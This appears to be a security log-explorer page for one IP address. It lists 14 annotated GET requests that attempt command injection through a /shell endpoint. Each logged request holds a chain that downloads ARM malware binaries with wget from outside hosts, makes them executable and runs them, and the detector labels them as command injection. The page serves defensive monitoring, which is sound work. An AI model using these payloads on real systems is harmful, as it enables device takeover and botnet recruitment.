← Back to IP report
Log Explorer
Fact drill-down for
185.196.10.129
Risk
6
LOW
Scope
All time
All-time facts
14
In-scope
14
Filtered
14
Seen
2025-01-21
→
2025-02-05
Freestyle query (contains)
Time (days, optional)
Page size
25
50
100
200
Apply
Reset (all-time)
Active
(none)
Clear
Faceted filters (facts-based)
exact core + snapshot + optional start/end
Annotation facets
Annotator (exact)
(any)
base — 7
cmdi — 7
Severity (exact)
(any)
(none) — 7
28 — 7
Label (exact)
(any)
cmdi — 7
observed — 7
HTTP facets
Method (exact, case-insensitive)
(any)
GET — 14
HTTP status (exact)
(any)
301 — 14
Snapshot facets
Subnet (exact)
(any)
185.196.10.0/24 — 14
ASN (exact)
(any)
42624 — 14
Country / Region / City (exact)
(any country)
Switzerland — 14
(any region)
Bern — 14
(any city)
Bern — 14
Org contains (ip_org or as_org_name)
Custom time window (optional override)
Provide start/end to scope time explicitly (overrides days). Leave blank for all-time.
Start
End
Tip: keep windows tight when you need speed, but the default is fact-complete.
Top annotators (facts, in-scope)
base
7
cmdi
7
Top labels (facts, in-scope)
cmdi
7
observed
7
Click a pill to apply it as a filter.
Annotated access events
Showing page
1
/
1
— total
14
rows
← Prev
Next →
#
1
2025-02-05 16:38:17
event
2859307
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.19/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.19/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.19/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.19/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
event observed
details
—
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
2
2025-02-05 16:38:17
event
2859307
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.19/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.19/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.19/bins/hold.arm7;chmod 777 hold.arm7;'
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.19/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.19/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.19/bins/hold.arm7;chmod 777 hold.arm7;'
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
3
2025-01-23 00:07:42
event
2640818
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
event observed
details
—
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
4
2025-01-23 00:07:42
event
2640818
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
5
2025-01-22 23:32:01
event
2639795
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
event observed
details
—
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
6
2025-01-22 23:32:01
event
2639795
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
7
2025-01-22 11:57:15
event
2599779
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
event observed
details
—
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
8
2025-01-22 11:57:15
event
2599779
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
9
2025-01-22 10:17:31
event
2598820
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
event observed
details
—
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
10
2025-01-22 10:17:31
event
2598820
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
11
2025-01-21 21:25:35
event
2553087
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
event observed
details
—
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
12
2025-01-21 21:25:35
event
2553087
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
13
2025-01-21 20:50:16
event
2552680
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
event observed
details
—
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
#
14
2025-01-21 20:50:16
event
2552680
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold…
referer
-
UA
KrebsOnSecurity
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
More (full fields + snapshot)
expand
url
/shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\x5C/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\x5C/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws
referer
-
UA
KrebsOnSecurity
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?cd /tmp;rm holdarm hold.arm7;wget http:/\x5C/193.143.1.66/bins/hold.arm7;chmod 777 hold.arm7;'
subnet
185.196.10.0/24
asn
42624 — Global-Data System IT Corporation
geo
Switzerland, Bern, Bern
org
Global-Data System IT Corporation
×
This is a custom alert message.
×
Confirm Action
Are you sure you want to proceed?
